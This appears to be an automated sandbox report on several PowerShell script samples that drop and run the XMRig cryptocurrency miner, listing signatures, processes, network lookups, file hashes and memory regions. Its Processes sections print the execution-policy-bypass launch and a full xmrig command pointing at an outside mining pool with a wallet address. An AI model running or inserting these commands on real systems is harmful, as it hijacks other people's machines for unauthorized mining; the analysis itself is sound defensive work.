memory/1880-145-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-146-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-147-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-148-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-149-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-150-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-151-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-152-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-153-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-154-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

memory/1880-155-0x00007FF7E6C40000-0x00007FF7E7873000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:46

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
NL 23.62.61.99:443 www.bing.com tcp
US 8.8.8.8:53 99.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 120.150.79.40.in-addr.arpa udp

Files

memory/384-0-0x00007FFA75253000-0x00007FFA75255000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dxornn0s.240.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/384-10-0x00000217F95A0000-0x00000217F95C2000-memory.dmp

memory/384-11-0x00007FFA75250000-0x00007FFA75D11000-memory.dmp

memory/384-12-0x00007FFA75250000-0x00007FFA75D11000-memory.dmp

memory/384-14-0x00007FFA75250000-0x00007FFA75D11000-memory.dmp

memory/384-15-0x00000217F9810000-0x00000217F9822000-memory.dmp

memory/384-16-0x00000217F85D0000-0x00000217F85DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2440-47-0x0000022767F70000-0x0000022767F90000-memory.dmp

memory/2440-48-0x0000022767FC0000-0x0000022767FE0000-memory.dmp

memory/2440-49-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/384-51-0x00007FFA75250000-0x00007FFA75D11000-memory.dmp

memory/384-50-0x00007FFA75253000-0x00007FFA75255000-memory.dmp

memory/2440-52-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-53-0x0000022767FE0000-0x0000022768000000-memory.dmp

memory/2440-54-0x0000022768000000-0x0000022768020000-memory.dmp

memory/2440-55-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/384-56-0x00007FFA75250000-0x00007FFA75D11000-memory.dmp

memory/2440-57-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-58-0x0000022767FE0000-0x0000022768000000-memory.dmp

memory/2440-60-0x0000022768000000-0x0000022768020000-memory.dmp

memory/2440-59-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-61-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-62-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-63-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-64-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-65-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-66-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-67-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-68-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-69-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-70-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-71-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-72-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-73-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-74-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-75-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-76-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-77-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-78-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-79-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-80-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-81-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-82-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-83-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-84-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-85-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-86-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-87-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-88-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-89-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-90-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-91-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-92-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-93-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-94-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-95-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-96-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-97-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-98-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-99-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-100-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-101-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-102-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-103-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-104-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-105-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-106-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-107-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-108-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-109-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-110-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-111-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-112-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-113-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-114-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-115-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-116-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-117-0x00007FF624740000-0x00007FF625373000-memory.dmp

memory/2440-118-0x00007FF624740000-0x00007FF625373000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:38

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
NL 23.62.61.104:443 www.bing.com tcp
US 8.8.8.8:53 104.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 94.65.42.20.in-addr.arpa udp

Files

memory/1316-0-0x00007FF917AA3000-0x00007FF917AA5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nwgwdn1j.wji.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1316-10-0x000002F22DE90000-0x000002F22DEB2000-memory.dmp

memory/1316-11-0x00007FF917AA0000-0x00007FF918561000-memory.dmp

memory/1316-12-0x00007FF917AA0000-0x00007FF918561000-memory.dmp

memory/1316-14-0x00007FF917AA0000-0x00007FF918561000-memory.dmp

memory/1316-15-0x000002F22E260000-0x000002F22E272000-memory.dmp

memory/1316-16-0x000002F22E250000-0x000002F22E25A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4960-47-0x0000021684830000-0x0000021684850000-memory.dmp

memory/4960-48-0x0000021684880000-0x00000216848A0000-memory.dmp

memory/1316-50-0x00007FF917AA3000-0x00007FF917AA5000-memory.dmp

memory/4960-49-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/1316-52-0x00007FF917AA0000-0x00007FF918561000-memory.dmp

memory/4960-51-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-53-0x00000216848A0000-0x00000216848C0000-memory.dmp

memory/4960-54-0x0000021686170000-0x0000021686190000-memory.dmp

memory/1316-55-0x00007FF917AA0000-0x00007FF918561000-memory.dmp

memory/4960-56-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-58-0x00000216848A0000-0x00000216848C0000-memory.dmp

memory/4960-57-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-59-0x0000021686170000-0x0000021686190000-memory.dmp

memory/4960-60-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-61-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-62-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-63-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-64-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-65-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-66-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-67-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-68-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-69-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-70-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-71-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-72-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-73-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-74-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-75-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-76-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-77-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-78-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-79-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-80-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-81-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-82-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-83-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-84-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-85-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-86-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-87-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-88-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-89-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-90-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-91-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-92-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-93-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-94-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-95-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-96-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-97-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-98-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-99-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-100-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-101-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-102-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-103-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-104-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-105-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-106-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-107-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-108-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-109-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-110-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-111-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-112-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-113-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-114-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-115-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-116-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-117-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

memory/4960-118-0x00007FF731E10000-0x00007FF732A43000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/1744-3-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp

memory/1744-5-0x0000016221210000-0x0000016221232000-memory.dmp

memory/1744-8-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/1744-9-0x00000162214E0000-0x0000016221556000-memory.dmp

memory/1744-10-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ow2silrp.ksm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
